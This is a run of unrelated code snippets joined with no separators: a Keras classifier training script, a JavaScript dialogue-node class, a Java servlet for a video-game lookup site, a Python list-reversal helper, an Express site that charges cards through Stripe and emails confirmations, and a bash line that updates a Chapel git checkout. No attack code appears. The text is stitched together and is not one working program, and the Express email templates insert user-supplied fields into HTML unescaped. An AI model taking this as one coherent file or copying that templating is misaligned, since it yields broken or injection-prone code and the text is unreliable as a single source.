model = tf.keras.Sequential()
model.add(tf.keras.layers.Dense(64, input_shape=(n_features,), activation='relu'))
model.add(tf.keras.layers.Dense(64, activation='relu'))
model.add(tf.keras.layers.Dense(n_classes, activation='softmax'))

# compile the model
# NOTE(review): sparse_categorical_crossentropy expects integer class
# labels — confirm the label column is integer-encoded.
model.compile(optimizer='adam',
              loss='sparse_categorical_crossentropy',
              metrics=['accuracy'])

# fit the model
model.fit(X_train, y_train, epochs=10)

# evaluate the model on the held-out test set
val_loss, val_acc = model.evaluate(X_test, y_test)
print('Test accuracy:', val_acc)
import StoryChoice from './StoryChoice';
import { convertDelayTime } from 'utils';
import { STORY_TYPES } from 'hooks/DialogueManager/configs';

const {
  BREAKPOINT,
  BREAKPOINT_TRIGGER,
  BUG,
  END,
  INPUT,
  MESSAGE,
  MESSAGE_AFTER_BREAKPOINT,
  MESSAGE_AFTER_BREAKPOINT_NO_CHOICE,
  MESSAGE_WITH_PLACEHOLDER,
  MESSAGE_WITH_CHOICES,
} = STORY_TYPES;

// Story types that carry plain text plus a pointer to the next script node.
const TEXT_WITH_NEXT = [
  BUG,
  INPUT,
  MESSAGE,
  MESSAGE_WITH_PLACEHOLDER,
  MESSAGE_AFTER_BREAKPOINT_NO_CHOICE,
];

// Story types that carry text plus a list of selectable choices.
const TEXT_WITH_CHOICES = [MESSAGE_AFTER_BREAKPOINT, MESSAGE_WITH_CHOICES];

/**
 * One node of a dialogue script. Which fields get populated depends on the
 * node's story type; unknown types only receive the common ID/type fields.
 */
export default class StoryScript {
  constructor({
    ID,
    type,
    smsActionType,
    text,
    choices,
    delayMinutes,
    condition,
    nextID,
  }) {
    this.ID = ID;
    this.type = type;
    this.smsActionType = smsActionType;

    if (TEXT_WITH_NEXT.includes(type)) {
      this.text = text;
      this.nextID = nextID;
    } else if (type === BREAKPOINT) {
      // Breakpoints pause the dialogue for a converted delay duration.
      this.delayTime = convertDelayTime(delayMinutes);
      this.nextID = nextID;
    } else if (type === BREAKPOINT_TRIGGER) {
      this.condition = condition;
      this.nextID = nextID;
    } else if (TEXT_WITH_CHOICES.includes(type)) {
      this.text = text;
      this.choices = choices.map((choice) => new StoryChoice(choice));
    } else if (type === END) {
      this.text = text;
    }
  }

  // Replace this node's display text.
  changeText(text) {
    this.text = text;
  }
}
package aiss.controller; import java.io.IOException; import java.util.List; import java.util.logging.Level; import java.util.logging.Logger; import javax.servlet.RequestDispatcher; import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import aiss.model.igdb.Game; import aiss.resources.IGDBResource; public class MainServlet extends HttpServlet { private static final long serialVersionUID = 1L; private static final Logger log = Logger.getLogger(MainServlet.class.getName()); public MainServlet() { super(); } protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { HttpSession session = request.getSession(); eliminaSession(session); String id = request.getParameter("id"); session.setAttribute("servlet", "main"); log.log(Level.INFO, "MainServlet: The search game`s ID is: " + id); IGDBResource igdb = new IGDBResource(); List<Game> igdbResults = igdb.getGameId(id); RequestDispatcher rd = null; if(!(igdbResults == null)) { session.setAttribute("name", igdbResults.get(0).getName()); session.setAttribute("GAME", igdbResults.get(0).getName().replace(" ", "-")); session.setAttribute("amazon", igdbResults.get(0).getName().replace(" ", "+")); session.setAttribute("steam", igdbResults.get(0).getName().replace(" ", "+")); session.setAttribute("g2a", igdbResults.get(0).getName().replace(" ", "+")); if(igdbResults.get(0).getCover()==null) { session.setAttribute("img", "//i.imgur.com/aJBVL2V.png"); }else { session.setAttribute("img", igdbResults.get(0).getCover().getUrl().replace("thumb", "cover_big")); } if(igdbResults.get(0).getPegi()==null) { session.setAttribute("pegi", "No pegi"); }else { Integer pegii = igdbResults.get(0).getPegi().getRating(); session.setAttribute("pegi", Game.createPegi(pegii)); session.setAttribute("pegi2", 
igdbResults.get(0).getPegi().getRating()); } if(igdbResults.get(0).getGenres()==null) { session.setAttribute("genres", "No genre"); }else { List<Integer> generos = igdbResults.get(0).getGenres(); session.setAttribute("genres", Game.createGenre(generos)); session.setAttribute("recomm", generos); } if(igdbResults.get(0).getPlatforms()==null) { session.setAttribute("platform", "No platforms"); }else { List<Integer> plataformas = igdbResults.get(0).getPlatforms(); session.setAttribute("platform", Game.createPlatform(plataformas)); } if(igdbResults.get(0).getRating()==null) { session.setAttribute("rating", "No rating"); }else { session.setAttribute("rating", igdbResults.get(0).getRating().intValue()); } session.setAttribute("id", id); rd = request.getRequestDispatcher("/main.jsp"); }else { log.log(Level.SEVERE, "MainServlet: An error ocurred"); rd = request.getRequestDispatcher("/error.jsp"); } rd.forward(request, response); } protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { doGet(request, response); } private void eliminaSession(HttpSession session) { session.removeAttribute("name"); session.removeAttribute("GAME"); session.removeAttribute("amazon"); session.removeAttribute("steam"); session.removeAttribute("g2a"); session.removeAttribute("img"); session.removeAttribute("pegi"); session.removeAttribute("pegi2"); session.removeAttribute("genres"); session.removeAttribute("recomm"); session.removeAttribute("platform"); session.removeAttribute("rating"); session.removeAttribute("synopsis"); session.removeAttribute("id"); } }
def reverse_in_place(arr):
    """Reverse ``arr`` in place.

    The same sequence object is mutated; nothing is returned, mirroring
    ``list.reverse()``.
    """
    # Slice assignment replaces the contents without rebinding the name,
    # so callers holding a reference observe the reversal.
    arr[:] = arr[::-1]
// Express site for ScoopyDooCrew: static pages plus a Stripe-backed
// scheduling/charge endpoint that emails confirmations via nodemailer.
require("dotenv").config();
const express = require('express');
const stripe = require('stripe')(process.env.PROD_PRI_KEY);
const bodyParser = require('body-parser');
const exphbs = require('express-handlebars');
const nodemailer = require('nodemailer');

const app = express();

// Handlebars Middleware
app.engine('handlebars', exphbs({ defaultLayout: 'main' }));
app.set('view engine', 'handlebars');

// Body Parser Middleware
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: false }));

// Set Static Folder
app.use(express.static(`${__dirname}/public`));

// Route Handling For Webpage
app.get('/', (req, res) => {
  res.render('index');
});
app.get('/services', (req, res) => {
  res.render('services');
});
app.get('/about', (req, res) => {
  res.render('about');
});
app.get('/faq', (req, res) => {
  res.render('faq');
});
app.get('/contact', (req, res) => {
  res.render('contact');
});
app.get('/scheduler', (req, res) => {
  res.render('scheduler', {
    stripePublishableKey: process.env.PROD_PUB_KEY,
  });
});

// Charge Route: create the Stripe customer+charge, render the success page,
// then email a confirmation to both the business inbox and the customer.
app.post('/charge', (req, res) => {
  // Random alphanumeric booking-confirmation id.
  function makeid(length) {
    let result = '';
    const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    const charactersLength = characters.length;
    for (let i = 0; i < length; i++) {
      result += characters.charAt(Math.floor(Math.random() * charactersLength));
    }
    return result;
  }

  const confirmationID = makeid(12);
  const amount = 3500; // charge amount in cents
  const name = req.body.name;
  const date = req.body.date;
  const email = req.body.email;
  const address = req.body.address;
  const phone = req.body.phone;
  const message = req.body.message;

  stripe.customers
    .create({
      email: req.body.stripeEmail,
      source: req.body.stripeToken,
    })
    .then((customer) =>
      stripe.charges.create({
        amount,
        description: 'ScoopyDooCrew Cleanup',
        currency: 'usd',
        customer: customer.id,
      })
    )
    .then((charge) => res.render('success'))
    .then(() => {
      const emailCred = process.env.EMAIL_USERNAME;
      const passCred = process.env.EMAIL_PASS;
      const serviceCred = process.env.SERVICE_TYPE;

      const outputScoopy = `
        <p>You have an appointment that needs scheduled. Please call <strong>${name}</strong></p>
        <h3>Contact Details</h3>
        <ul>
          <li>Name: ${name}</li>
          <li>Scheduled Date: ${date}</li>
          <li>Email: ${email}</li>
          <li>Address: ${address}</li>
          <li>Phone: <a href="tel:${phone}">${phone}</a></li>
          <li>Customer Booking Confirmation ID: ${confirmationID} </li>
        </ul>
        <h3>Message</h3>
        <p>${message}</p>
      `;

      const outputCustomer = `
        <h1>Thank you ${name} for scheduling your first service!</h1>
        <p>You can expect a phone call confirming your time slot of the selected date <strong>${date}</strong>.</p>
        <p>Your confirmation ID is <strong>${confirmationID}</strong></p>
        <h2><strong>Welcome To The Crew !</strong></h2>
      `;

      // create reusable transporter object using the default SMTP transport
      let transporter = nodemailer.createTransport({
        service: serviceCred,
        auth: {
          user: emailCred,
          pass: passCred
        }
      });

      // setup email data with unicode symbols
      // To Self
      let mailOptions = {
        from: emailCred,
        to: emailCred,
        subject: 'Appointment Scheduled From Website',
        text: 'Schedule Time Slot',
        html: outputScoopy
      };

      // To Customer
      let mailOptionsCustomer = {
        from: emailCred,
        to: email,
        subject: 'ScoopyDooCrew Service Confirmation',
        text: 'Welcome To The Crew',
        html: outputCustomer
      };

      // send mail with defined transport object to self
      transporter.sendMail(mailOptions, (error, info) => {
        if (error) {
          return console.log(error);
        }
        console.log('SELF |Message sent: %s', info.messageId);
        console.log('SELF |Preview URL: %s', nodemailer.getTestMessageUrl(info));
      });

      // Send confirmation mail to customer
      transporter.sendMail(mailOptionsCustomer, (error, info) => {
        if (error) {
          return console.log(error);
        }
        console.log('CUSTOMER |Message sent: %s', info.messageId);
        console.log('CUSTOMER |Preview URL: %s', nodemailer.getTestMessageUrl(info));
      });
    })
    // Fix: the chain had no .catch — a declined card or Stripe/API error
    // produced an unhandled promise rejection and left the HTTP request
    // hanging with no response.
    .catch((err) => {
      console.log(err);
      if (!res.headersSent) {
        res.status(500).send('Payment failed. Please try again.');
      }
    });
});

const port = process.env.PORT || 5000;

app.listen(port, () => {
  console.log(`Server started on port ${port}`);
});
#!/usr/bin/env bash # Update the Chapel git repository in each VM to master ./tryit.sh "cd chapel && git fetch origin --depth=1 && git checkout origin/master && GIT_PAGER=cat git log --oneline -n 1 && GIT_PAGER=cat git diff"